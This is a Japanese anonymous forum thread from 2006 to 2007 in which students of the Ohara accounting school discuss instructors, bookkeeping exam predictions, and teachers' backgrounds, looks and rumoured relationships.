173 :一般に公正妥当と認められた名無しさん:2006/10/18(水) 09:24:22 ID:oFfD+FIP
あなたも生徒に本気になった事ありますか?
12歳年下の女子生徒に興味ありますか?

174 :一般に公正妥当と認められた名無しさん:2006/10/18(水) 21:13:09 ID:o4KQ56KK
本科


175 :一般に公正妥当と認められた名無しさん:2006/10/19(木) 16:07:32 ID:/KKEn41E
本科講師は比較的若いし生徒も若いからはじめから真剣につきあうのは難しいんじゃない?


176 :一般に公正妥当と認められた名無しさん:2006/10/21(土) 20:02:45 ID:AiNxGiv0
いいえそんなことは無いと思います
ねえ先生

177 :一般に公正妥当と認められた名無しさん:2006/10/22(日) 17:18:55 ID:bdRNKpKY
横浜校に通いたいのですが、金子先生、高村先生、本田先生に教えて頂いたことのある方いませんか?
わかりやすいのでしょうか?

178 :一般に公正妥当と認められた名無しさん:2006/10/24(火) 23:01:05 ID:tZ9mgXDA
1級のDVD講師は?

179 :一般に公正妥当と認められた名無しさん:2006/10/25(水) 00:52:55 ID:???
自分で問い合わせ汁。

このスレのヤツらは何故にsageないヤツばかりなんだ・・・

180 :一般に公正妥当と認められた名無しさん:2006/10/25(水) 02:00:35 ID:???
誰か114回2級の予想をドンピシャで当ててください
おにがいします

181 :一般に公正妥当と認められた名無しさん:2006/10/25(水) 23:37:00 ID:???
商簿が出る!

182 :一般に公正妥当と認められた名無しさん:2006/10/26(木) 00:15:53 ID:???
工簿もでるらしいぞ!!

183 :一般に公正妥当と認められた名無しさん:2006/10/27(金) 19:48:33 ID:i2qRnwe8
名古屋の簿記の講師で変なのいない??

184 :名無し専門学校:2006/10/27(金) 20:55:06 ID:aBLNze4b
大原って一つの学校にいったい何人の講師がいるんだ!?

185 :一般に公正妥当と認められた名無しさん:2006/10/28(土) 20:18:38 ID:???
未来より来ました
第114回 2級は

第1問 仕訳(社債買入償還、委託販売、建設仮勘定、利益処分、未決算)
第2問 伝票(推定問題)
第3問 精算表
第4問 部門別計算(仕訳→勘定記入)
第5問 CVP分析(直接原価計算 損益計算書作成)

合格率28.3%でした
健闘を祈ります

186 :一般に公正妥当と認められた名無しさん:2006/11/11(土) 20:56:46 ID:LkUYRVrN
大原の現役講師にお聞きしたいです。
大原の講師になったきっかけは何でしたか?


187 :○○○:2006/11/12(日) 15:20:18 ID:zOxmnQr/
彼と一緒にいたいから


188 :一般に公正妥当と認められた名無しさん:2006/11/12(日) 15:45:16 ID:hrB23AR+
185さん、それを信じて私はもう寝ます。
それが当たらなくても私は泣きません。2月にかけます

189 :一般に公正妥当と認められた名無しさん:2006/11/19(日) 00:23:20 ID:???
担当講師さまへ。どうやら無理そうです。ごめんなさい。でも、頑張ってきます!

190 :一般に公正妥当と認められた名無しさん:2006/11/19(日) 00:27:29 ID:???
もう寝ます。目もショボショボしてきたし。
みんな明日頑張ろう!!

191 :一般に公正妥当と認められた名無しさん:2006/11/19(日) 08:51:45 ID:???
では行ってきます。自習室で最後の追い込みだ。
神棚にお願いした。おかーさんに合格おにぎり作ってもらった。
総武線快速が遅延らしいので、総武線沿線組は気をつけよう。
絶対合格するぞ!!

192 :一般に公正妥当と認められた名無しさん:2006/11/20(月) 18:44:43 ID:???
第114回 日商簿記検定受験の大原生のみなさまお疲れ様です
簿記講師の皆さまもお疲れ様です

スゲー疲れた しかしなかなかの出来
今日は有給取って爆睡した しばらくは何もできない・・
今日はこれからお疲れ様飲み会をやってくれるらしい
ありがとう友達

193 :一般に公正妥当と認められた名無しさん:2007/01/14(日) 13:45:23 ID:???
おかーさんに合格おにぎり

うらやましいぜチクショー

194 :一般に公正妥当と認められた名無しさん:2007/01/16(火) 11:54:43 ID:???
1級DVDに出てる先生ってうまいほう?

195 :一般に公正妥当と認められた名無しさん:2007/01/19(金) 20:40:14 ID:???
>194

教室収録は大原先生(男性)
スタジオ収録は幸村先生(女性)

どっちの先生だい?

196 :一般に公正妥当と認められた名無しさん:2007/01/23(火) 16:06:20 ID:MGey5X7d
159です
結局浮気されてました。
生徒だそうです。
向こうとは別れるといってるので、仲直りすることになりました。
でも、またされるんだろうな。
Tです。
見張っていてください。

197 :一般に公正妥当と認められた名無しさん:2007/01/24(水) 23:44:51 ID:???
大原の簿記(税理士、会計士科含む)講師の出身大学ってだいたいどのへん
なの?講師に直接聞いたら一人は高卒でもう一人は返事拒否された。
もしかしてDQN大?よくても日東駒専?

198 :一般に公正妥当と認められた名無しさん:2007/01/24(水) 23:47:13 ID:???
指導力に学歴云々は無いだろうに。
東大だったら良いのか?

199 :一般に公正妥当と認められた名無しさん:2007/01/24(水) 23:54:44 ID:???
もちろん

200 :一般に公正妥当と認められた名無しさん:2007/01/25(木) 01:30:22 ID:???
わざわざ東大出て会計士にならんだろ
いわんや簿記講師をや

201 :一般に公正妥当と認められた名無しさん:2007/01/25(木) 01:51:16 ID:6Kc/LtvQ
早稲田・慶應・日大・一橋それ以外は知らん。

202 :一般に公正妥当と認められた名無しさん:2007/01/25(木) 01:57:59 ID:???
慶應・一橋もいるんか?普通一般企業行くだろう?

203 :一般に公正妥当と認められた名無しさん:2007/01/25(木) 02:05:04 ID:6Kc/LtvQ
慶應はけっこういるぞ。

204 :一般に公正妥当と認められた名無しさん:2007/01/25(木) 02:15:01 ID:???
道間違えた人々?

205 :一般に公正妥当と認められた名無しさん:2007/01/25(木) 02:31:03 ID:???
簿記の講師って月給どのくらい貰ってんの?30代くらいで。

206 :一般に公正妥当と認められた名無しさん:2007/01/30(火) 03:10:46 ID:???
>>195
おそレス
教室収録もあるのかー
スタジオのほうです

207 :一般に公正妥当と認められた名無しさん:2007/02/05(月) 22:43:54 ID:T+xzZVPh
石戸先生ってNHKの藤井彩子アナに似てないか

208 :一般に公正妥当と認められた名無しさん:2007/02/08(木) 22:31:28 ID:BKvdGMmc
この学校で過ごした事しかない人間が
これから社会へ出ようとする学生に指導すること自体が
間違っている気がする
教師が何歳だろうとも

209 :一般に公正妥当と認められた名無しさん:2007/02/11(日) 19:56:37 ID:9onlvm8C
大原の講師終わってる

210 :一般に公正妥当と認められた名無しさん:2007/02/24(土) 04:17:00 ID:???
長田先生がベストだろ

211 :一般に公正妥当と認められた名無しさん:2007/02/24(土) 08:26:17 ID:YU7qY22c
もうすぐ卒業式講師の皆さんいそがしく なるでしょう。


212 :一般に公正妥当と認められた名無しさん:2007/02/24(土) 14:39:40 ID:???
大原会計士各科目
【簿記】
こうや(日大商or経済)
ふなと(慶大商)
いしど(早大政経)
いけだ(中大商)
【財表】
そう(早大政経)
【管理】
大石(早大政経)
高橋(早大政経)
加藤(慶大商)
鈴木(早大)
寺嶋(慶大商)
【租税】
佐藤(慶大商)
【企業法】
植田(明大法)
長谷川(中大法)
【監査】
山田(立命館)





213 :一般に公正妥当と認められた名無しさん:2007/02/24(土) 14:49:52 ID:???
大原会計士

会計士科長…
会計士科次長…平澤
簿記課長…小松
財表課長…
管理課長…平澤
租税課長…佐藤
監査課長…鈴木(達)
法律課長…山本
経営課長…谷田
経済課長…中野
統計課長…




214 :一般に公正妥当と認められた名無しさん:2007/02/24(土) 15:42:10 ID:???
甲谷は日大法だよ

215 :一般に公正妥当と認められた名無しさん:2007/02/24(土) 21:38:47 ID:eyzasDkG
中央卒のエリート講師が多いわ

216 :一般に公正妥当と認められた名無しさん:2007/02/24(土) 22:56:02 ID:???
二人で多いのかよ
どうせ長谷マニアだろ

217 :一般に公正妥当と認められた名無しさん:2007/03/02(金) 13:29:31 ID:xEoBNSlw
おい

218 :一般に公正妥当と認められた名無しさん:2007/03/02(金) 16:13:21 ID:???
「学生」の半分が学校職員=大原大など34校改善指導―文部省調査

文部科学省は1日、2003〜06年度に設置認可した大学などの追跡調査結果を公表した。
対象となった延べ459校のうち34校について、
計画通りの授業科目や職員数が確保されていないことなどが判明、同省は改善を指導した。
 それによると、34校のうち、昨年4月に開校した会計専門職育成の「大原大学院大学」(東京都)は、
定員30人の半数以上の16人が運営母体の学校法人「大原学園」の職員だった。
必修科目の出席回数が半分以下だったため、「計画の履行が著しく不十分」として早期是正を求めた。
 同大は「応募者が少なく、定員確保のため内部者に声を掛けた。職員のうち10人は2月末で退学した」と説明している。

219 :一般に公正妥当と認められた名無しさん:2007/03/02(金) 20:20:06 ID:???
大原税理士の出身大学知ってる人いますか?

220 :一般に公正妥当と認められた名無しさん:2007/03/03(土) 23:39:36 ID:???
石戸せんせは政経によくいるタイプの女だな

221 :一般に公正妥当と認められた名無しさん:2007/03/05(月) 01:50:54 ID:???
>>220
どういうこと?

222 :一般に公正妥当と認められた名無しさん:2007/03/10(土) 22:39:43 ID:???
あきたん・・・ (;´Д`)

223 :一般に公正妥当と認められた名無しさん:2007/03/16(金) 13:58:28 ID:???
>>221
ああいうちょっと気が強そうで、
だけど十代的な地味な服装の痩せた女が大井

224 :一般に公正妥当と認められた名無しさん:2007/03/16(金) 14:03:47 ID:???
新入りの舟木せんせはどうよ

225 :一般に公正妥当と認められた名無しさん:2007/03/22(木) 01:36:23 ID:???
きつよ

226 :一般に公正妥当と認められた名無しさん:2007/03/22(木) 04:20:27 ID:???
新入りの方のさとぅ先生、アゲ

227 :一般に公正妥当と認められた名無しさん:2007/03/23(金) 01:45:01 ID:d+owk6BB
まんまる

228 :一般に公正妥当と認められた名無しさん :2007/03/23(金) 13:20:39 ID:???
石戸まじタイプなんだけど…普通に可愛い

229 :一般に公正妥当と認められた名無しさん:2007/03/24(土) 01:03:51 ID:???
新入りの女性講師はどうよ?
まだどんな人だか知らないんだけど
財務短答の問題はなかなか良問だった

230 :一般に公正妥当と認められた名無しさん:2007/03/24(土) 15:50:51 ID:???
>>212

講師の出身校って知らなかったけど、想像していたとおりでびっくりした。

>>228

同感。立ち振る舞いと話し方がかわいい。

231 :一般に公正妥当と認められた名無しさん:2007/03/24(土) 16:07:44 ID:???
石戸は性格がキツそうで苦手な漏れ・・・orz

232 :一般に公正妥当と認められた名無しさん:2007/03/24(土) 16:09:48 ID:???
租税の佐藤先生はしゃべらなかったら男前系。

233 :一般に公正妥当と認められた名無しさん:2007/03/24(土) 21:48:41 ID:???
バカ殿様

234 :一般に公正妥当と認められた名無しさん :2007/03/24(土) 22:48:27 ID:nY1MfVol
甲谷先生が大学受験生だった頃の日大は難しかったからな
煽りぬきで今の社学くらいの難しさはあったと思われる

235 :一般に公正妥当と認められた名無しさん :2007/03/24(土) 23:57:47 ID:???
石戸さん、大人気だな。かく言う俺も石戸ファンなわけだが。
合格したら告白しようかと本気で考えてしまう今日この頃。
結婚とかしてないよね?

236 :一般に公正妥当と認められた名無しさん:2007/03/25(日) 00:59:27 ID:???
そんなにカワイイか?

237 :一般に公正妥当と認められた名無しさん:2007/03/25(日) 01:44:29 ID:???
顔は可愛いと思うが?

238 :一般に公正妥当と認められた名無しさん:2007/03/25(日) 02:08:37 ID:???
普通っぽいところがよいのでは?

239 :一般に公正妥当と認められた名無しさん:2007/03/25(日) 02:31:27 ID:???
あきたん好き

240 :一般に公正妥当と認められた名無しさん:2007/03/25(日) 14:33:33 ID:???
清水と付き合ってるんじゃなかった毛?

241 :一般に公正妥当と認められた名無しさん:2007/03/25(日) 19:39:06 ID:???
うほっ

242 :一般に公正妥当と認められた名無しさん:2007/03/25(日) 19:52:59 ID:???
>>240
そうだったんだ…
超ショック…


243 :一般に公正妥当と認められた名無しさん:2007/03/25(日) 20:52:34 ID:???
おっイイ男とイイ女のカップルじゃん

244 :一般に公正妥当と認められた名無しさん:2007/03/25(日) 22:42:31 ID:???
ガセだと信じたい。

245 :一般に公正妥当と認められた名無しさん:2007/03/25(日) 22:53:59 ID:???
ヤリヤリだよ!!

246 :一般に公正妥当と認められた名無しさん:2007/03/26(月) 00:03:48 ID:???
ハァ〜メェ〜ハァ〜メェ〜波ァァーーーーーーーーーーーーーーーーーーーーーーーーー

247 :一般に公正妥当と認められた名無しさん:2007/03/26(月) 00:17:26 ID:???
大原は美人講師多いな

248 :一般に公正妥当と認められた名無しさん:2007/03/26(月) 01:09:18 ID:???
加悦たん大好きwww

249 :一般に公正妥当と認められた名無しさん :2007/03/26(月) 10:50:47 ID:???
>>243
事実だとすると正直、不釣合いに見えんか?

250 :一般に公正妥当と認められた名無しさん:2007/03/26(月) 15:19:29 ID:???
>>249
どっちに合併差益が発生してる?

251 : ◆/LOOPER/X. :2007/03/26(月) 15:40:42 ID:w0y0N4ZW
オーリンズDFV入れた子はいらっしゃいますか?
塩梅いかがでしょうか?

252 :一般に公正妥当と認められた名無しさん :2007/03/26(月) 15:54:24 ID:???
どう考えても清水が取得企業だろうな

253 :一般に公正妥当と認められた名無しさん :2007/03/26(月) 15:55:36 ID:???
マジかガセかは知らんが講師同士の恋愛が受講生に筒抜けって
どういう予備校なんだよw

254 :一般に公正妥当と認められた名無しさん:2007/03/26(月) 19:47:02 ID:???
清水は受験生だろ

255 :一般に公正妥当と認められた名無しさん :2007/03/26(月) 23:26:04 ID:xSjLnNLZ
>>254
マジ?
「私が受験した頃は」とか言ってなかった?

256 :一般に公正妥当と認められた名無しさん :2007/03/26(月) 23:27:07 ID:???
スクーリングで石戸が来たけど実物より写真の方がかわいかった

257 :一般に公正妥当と認められた名無しさん :2007/03/27(火) 00:25:57 ID:???
甲谷でも舟戸でもなく清水というのが石戸ヲタにはショックのようですなw

258 :一般に公正妥当と認められた名無しさん:2007/03/27(火) 00:31:09 ID:???
チンコでかそう

259 :一般に公正妥当と認められた名無しさん:2007/03/27(火) 00:31:12 ID:5D6t5O9z
甲やのカスさはガチ!!!
中村先生はサイコー

260 :一般に公正妥当と認められた名無しさん:2007/03/27(火) 01:37:09 ID:???
Iちゃんはどうなのよ?

261 :一般に公正妥当と認められた名無しさん:2007/03/27(火) 01:57:25 ID:???
>>255
http://www.jicpa.or.jp/member_search/ms.php
ここで検索しても会員にも準会員にもいないから
会計士試験には通ってないと思う。
現時点で受験生なのか、試験を諦めて講師に専念してるかは知らないけど。

262 :一般に公正妥当と認められた名無しさん:2007/03/27(火) 02:56:36 ID:7P17JyzA
石戸はちょっとかわいい会計士の早稲ジョ。
清水はイケメンの慶応卒の会計士。
世間的にどっちがモテルかなんて一目瞭然だろ。
女会計士なんて、かわいくてもひかれるだけ。
ってか、おまえら会計士の受験勉強なんてして予備校に篭ってるから目がくもってるだけで
街に出てみろ。もっとかわいい奴なんて腐るほどいる。
一方の清水なんかは合コンいってもかなりもてる方だろう。
会計士自体はそんなにモテル職業じゃないけどイケメン
って言うなら話は別。普通面の商社、電通マンくらいの評価はあるんじゃない。
つまり、女なんて選び放題遊び放題。

263 :一般に公正妥当と認められた名無しさん:2007/03/27(火) 03:12:41 ID:???
甲谷は?

264 :一般に公正妥当と認められた名無しさん:2007/03/27(火) 08:19:43 ID:+nzzG6Dc
ガンヲタペリーはちょっと。

265 :一般に公正妥当と認められた名無しさん :2007/03/27(火) 12:03:56 ID:ONj+FoLf
>>261
しかし受かってない新人講師をステップの収録に出すかなァ・・

266 :一般に公正妥当と認められた名無しさん :2007/03/27(火) 12:31:54 ID:???
>>261
何だよそれ!
高校時代の友達に会計士受かったって
嘘ついたのバレちゃうじゃんかよ!

267 :一般に公正妥当と認められた名無しさん :2007/03/27(火) 12:34:55 ID:???
06年合格した友達も既に検索できるとは。
やっぱり清水は受験生だったのか・・?

268 :一般に公正妥当と認められた名無しさん:2007/03/27(火) 13:18:11 ID:OoamOlzp
ヒント:偽名

269 :一般に公正妥当と認められた名無しさん :2007/03/27(火) 13:27:02 ID:???
266だが、幸い同姓同名の会計士がいたようだ(ほっ

270 :一般に公正妥当と認められた名無しさん :2007/03/27(火) 13:28:13 ID:???
大原講師が会計士なのかほとんどわかってしまったよw

271 :一般に公正妥当と認められた名無しさん:2007/03/27(火) 13:29:16 ID:???
>>269
そのネタおもしろいね!

272 :一般に公正妥当と認められた名無しさん :2007/03/27(火) 13:34:24 ID:???
ゼミの先輩、会員にも準会員にも載ってないんだが
どういうこと?間違いなく受かっていたんだけど。抹消?

273 :一般に公正妥当と認められた名無しさん :2007/03/27(火) 13:44:28 ID:???
>>271
一回きりの電話で直に会わなかったから「監査つまんないよ〜」とか
言いたい放題だったわけだがwww
まあ、どっちみちあそこで検索なんか99%しないだろうから
杞憂なんだけど
スレ違いスマソ

274 :一般に公正妥当と認められた名無しさん :2007/03/27(火) 14:41:58 ID:???
>>268
他の予備校と掛け持ちする講師は片方で本名、もう片方で
偽名を使うことがあるな。
大原は偽名を許可してる?

275 :一般に公正妥当と認められた名無しさん:2007/03/27(火) 14:48:13 ID:???
池のSはひょっとしてアホなんだろうか?
カードの支払いくらいまともに出来ないとは。

276 :一般に公正妥当と認められた名無しさん :2007/03/27(火) 14:49:04 ID:???
清水は去年まで大原にいなかったのにいきなり
ステップ収録クラスを
担当してるからな。他で講師歴があると考えるのが普通かも。

277 :一般に公正妥当と認められた名無しさん :2007/03/27(火) 14:59:38 ID:???
清水は顔もだけど雰囲気がカッコイイな

278 :一般に公正妥当と認められた名無しさん :2007/03/27(火) 15:07:35 ID:???
新宿地区=あずさ
港地区=トーマツ
千代田地区=新日本

で合ってるのかな?

279 :一般に公正妥当と認められた名無しさん:2007/03/27(火) 15:31:30 ID:???
つーか清水レジュメすげーよ。
あれなかったら、大原の解答解説しょぼすぎるぞ。
どんどん、延長解説してくれって感じだ。
逆にアクセスは解説詳しいけどレジュメない。

280 :一般に公正妥当と認められた名無しさん:2007/03/27(火) 15:36:04 ID:???
長田さんもアクセルじゃ偽名だもんな。
長田、舟戸の両看板講師の代わりとして
清水はどっかから大原が引き抜いたんだろうね。
さすがに、清水いなかったら簿記講師陣やばすぎだろ。

281 :一般に公正妥当と認められた名無しさん :2007/03/27(火) 15:40:58 ID:???
清水アキラからヒントを得たのだろうか

282 :一般に公正妥当と認められた名無しさん:2007/03/27(火) 22:15:04 ID:???
石戸先生も清水先生もどちらもまだ見たことない。
ここでの評判どうりの可愛いのとイケメンなの?
今度、質問行くときに指名してみよう

283 :一般に公正妥当と認められた名無しさん:2007/03/27(火) 23:17:01 ID:???
>>282
パンフに顔写真が載ってるよー

284 :一般に公正妥当と認められた名無しさん :2007/03/27(火) 23:57:55 ID:???
清水のイケメンぶりは写真じゃなくて映像を見ないと伝わってこないと思う

285 :一般に公正妥当と認められた名無しさん:2007/03/28(水) 00:22:25 ID:???
イケメンといえば監査のY田先生でしょう

286 :一般に公正妥当と認められた名無しさん :2007/03/28(水) 00:33:14 ID:???
大原の簿記答練解説冊子は仕訳がひたすら書いてあるだけで
わかりにくいことこの上ないからな
清水の解説を拝んでいるよ

287 :一般に公正妥当と認められた名無しさん:2007/03/28(水) 01:14:11 ID:???
清水は舟戸より良いよなー。
っていうか、あれ以上のものはなかなか望めない気がする。
おかげで苦手な簿記が出来るようになってきたよ。
最初はこんな、イケメン若造大丈夫か?
と思ってたが、今は尊敬してるよ。
パンフの写真は笑いすぎだろ。イケメンには見えないな。

288 :一般に公正妥当と認められた名無しさん :2007/03/29(木) 14:59:45 ID:RGtUxgt9
>>261
福島と鈴木達の名前がヒットしないんだがww

289 :一般に公正妥当と認められた名無しさん :2007/03/29(木) 15:04:16 ID:???
新人講師の選考って容姿も考慮されるのかなあ

290 :一般に公正妥当と認められた名無しさん:2007/03/29(木) 15:26:27 ID:lJnrEe27
>>288
長谷川も

291 :一般に公正妥当と認められた名無しさん :2007/03/29(木) 15:43:30 ID:???
長谷川たんは日弁連では?

292 :一般に公正妥当と認められた名無しさん:2007/03/29(木) 17:50:21 ID:???
>>288
達也は会計士じゃない

293 :一般に公正妥当と認められた名無しさん :2007/03/29(木) 19:49:20 ID:iPWOfGxr
会計士受かったのに会員でも準会員でもないってありえる?

294 :一般に公正妥当と認められた名無しさん:2007/03/29(木) 22:08:27 ID:???
キノコは準会員。

295 :一般に公正妥当と認められた名無しさん:2007/03/29(木) 23:08:18 ID:???
>>293
会計士協会に登録していなければ会員でも準会員でもない。
完全に講師に専念するつもり(非常勤で監査の仕事をする気がない)なら
登録してない可能性もある。

296 :一般に公正妥当と認められた名無しさん:2007/03/29(木) 23:11:58 ID:???
清水は受験生
昨年会計学科目合格

297 :一般に公正妥当と認められた名無しさん:2007/03/29(木) 23:14:12 ID:???
ちなみに企業法科所属の講師は司法試験受験生
事務1人、大学の講師1人除いて。




298 :一般に公正妥当と認められた名無しさん:2007/03/29(木) 23:17:39 ID:???
分かり易ければ受験生も会計士でもどっちでもいーやw

合格者だから講義が素晴らしいって訳じゃないし。

299 :一般に公正妥当と認められた名無しさん:2007/03/30(金) 00:10:53 ID:???
>>298
その通り
とりあえず合格させるだけの講義やってくれれば
中卒であろうと文句は言わない

300 :一般に公正妥当と認められた名無しさん :2007/03/30(金) 00:34:01 ID:wApdUgdO
わかりやすく教えられるのは自分の頭を整理するのが得意な人らしい
確かに「えー」「あー」を連発する講師でわかりやすい授業する人は
見たことがない

301 :一般に公正妥当と認められた名無しさん :2007/03/30(金) 00:37:32 ID:???
大原は何気にいい講師を揃えてると思うよ

302 :一般に公正妥当と認められた名無しさん :2007/03/31(土) 22:43:24 ID:hWWrH4LV
清水タン「昨日の発表で残念な結果に終わってしまった方は」
とか言っていたから受験生ってことはないんじゃない?

303 :一般に公正妥当と認められた名無しさん :2007/03/31(土) 23:46:50 ID:???
清水レジュメは舟戸レジュメと同じじゃね?

簿記課全体で作ってるのかな

304 :一般に公正妥当と認められた名無しさん:2007/04/04(水) 23:59:17 ID:???
っていうか、会計学科目合格って、会計学に関しては合格者の上位半分以上に
いたわけだから、簿記の講師としては十分すぎるのでは?

305 :一般に公正妥当と認められた名無しさん:2007/04/06(金) 11:49:33 ID:???
>>304
一括合格のやつより良いよな。
俺なんて、51Aで落ちたけど、簿記の実力
清水の半分以下だよ。

306 :一般に公正妥当と認められた名無しさん:2007/04/06(金) 23:24:38 ID:???
ST解説が清水でよかったと思ってるヤシ、手を叩け。

307 :一般に公正妥当と認められた名無しさん:2007/04/07(土) 02:48:46 ID:pIwtyBjs
シーン

308 :一般に公正妥当と認められた名無しさん:2007/04/07(土) 10:33:54 ID:???
パチパチ

309 :一般に公正妥当と認められた名無しさん:2007/04/07(土) 11:18:10 ID:???
石戸っていなくなっちゃったの?
職員室のホワイトボードから名前が消えていたのだが。。。

310 :1488 ◆lXrxEx.8dY :2007/04/07(土) 12:18:55 ID:???
随分と呑気な連中どもやな!!!!!!!!!
このスレはぬるま湯やwwwwwwwwwwwwwwwww!!!!!!!!!!!!!!!
お前らまとめてかかってこんかーーーーーい!!!!!!!!!!!!!!!!!!!!!!!!!!!!

311 :一般に公正妥当と認められた名無しさん:2007/04/07(土) 12:51:04 ID:???
解説は清水で全然十分なんだけど、ステップ応用簡単すぎじゃないか?
管理もだけど、あれじゃ本試験に対応できんぞ。

312 :一般に公正妥当と認められた名無しさん:2007/04/07(土) 14:17:14 ID:???
ステップ簿記はあれでいいんじゃない?
管理はやばい。手抜きにしか見えない。

313 :一般に公正妥当と認められた名無しさん:2007/04/07(土) 21:13:42 ID:???
あきたあああああああああああああああああああああああああああん


314 :一般に公正妥当と認められた名無しさん:2007/04/08(日) 22:35:18 ID:???
租税はステップいいね。
先生も渋い。

57 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)